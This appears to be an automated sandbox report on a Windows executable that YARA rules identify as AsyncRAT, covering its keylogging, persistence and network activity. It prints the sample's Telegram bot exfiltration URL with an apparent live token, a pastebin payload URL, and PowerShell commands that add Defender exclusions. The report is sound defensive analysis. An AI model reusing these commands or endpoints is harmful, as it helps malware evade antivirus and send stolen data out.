                                    Source: powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegrP
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                    Source: 2QaN4hOyJs.exe, System.0.drString found in binary or memory: https://api.telegram.org/bot
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=77055
                                    Source: powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/4X62dQQ8
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49849 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49854 version: TLS 1.2

                                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                                    barindex
                                    Contains functionality to log keystrokes (.Net Source)
                                    Source: 2QaN4hOyJs.exe, XLogger.cs.Net Code: KeyboardLayout
                                    Source: System.0.dr, XLogger.cs.Net Code: KeyboardLayout
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    Operating System Destruction

                                    barindex
                                    Protects its processes via BreakOnTermination flag
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: 01 00 00 00 Jump to behavior

                                    System Summary

                                    barindex
                                    Malicious sample detected (through community Yara rule)
                                    Source: 2QaN4hOyJs.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: C:\Users\user\AppData\Local\Temp\System, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeCode function: 0_2_00007FF887D168320_2_00007FF887D16832
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeCode function: 0_2_00007FF887D15A860_2_00007FF887D15A86
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeCode function: 0_2_00007FF887D106100_2_00007FF887D10610
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeCode function: 0_2_00007FF887D119410_2_00007FF887D11941
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887D3247B2_2_00007FF887D3247B
                                    Source: 2QaN4hOyJs.exe, 00000000.00000000.1332540332.0000000000E4E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecheatix loader.exe4 vs 2QaN4hOyJs.exe
                                    Source: 2QaN4hOyJs.exe, 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecheatix loader.exe4 vs 2QaN4hOyJs.exe
                                    Source: 2QaN4hOyJs.exeBinary or memory string: OriginalFilenamecheatix loader.exe4 vs 2QaN4hOyJs.exe
                                    Source: 2QaN4hOyJs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: 2QaN4hOyJs.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: C:\Users\user\AppData\Local\Temp\System, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 2QaN4hOyJs.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 2QaN4hOyJs.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 2QaN4hOyJs.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: System.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: System.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: System.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 2QaN4hOyJs.exe, Settings.csBase64 encoded string: 'X/Ewgy+QbSJLs0T7nGLwMR/ReZ21T0NiAd+vtpjLh8PYyb7wl0jMqUfVN2AogCoK'
                                    Source: System.0.dr, Settings.csBase64 encoded string: 'X/Ewgy+QbSJLs0T7nGLwMR/ReZ21T0NiAd+vtpjLh8PYyb7wl0jMqUfVN2AogCoK'
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Settings.csBase64 encoded string: 'X/Ewgy+QbSJLs0T7nGLwMR/ReZ21T0NiAd+vtpjLh8PYyb7wl0jMqUfVN2AogCoK'
                                    Source: 2QaN4hOyJs.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: 2QaN4hOyJs.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: System.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: System.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/19@13/3
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnkJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2948:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeMutant created: \Sessions\1\BaseNamedObjects\KSE8vSJChSxv51Wx
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile created: C:\Users\user\AppData\Local\Temp\SystemJump to behavior
                                    Source: 2QaN4hOyJs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 2QaN4hOyJs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: 2QaN4hOyJs.exeReversingLabs: Detection: 81%
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile read: C:\Users\user\Desktop\2QaN4hOyJs.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\2QaN4hOyJs.exe "C:\Users\user\Desktop\2QaN4hOyJs.exe"
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: linkinfo.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ntshrui.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: cscapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
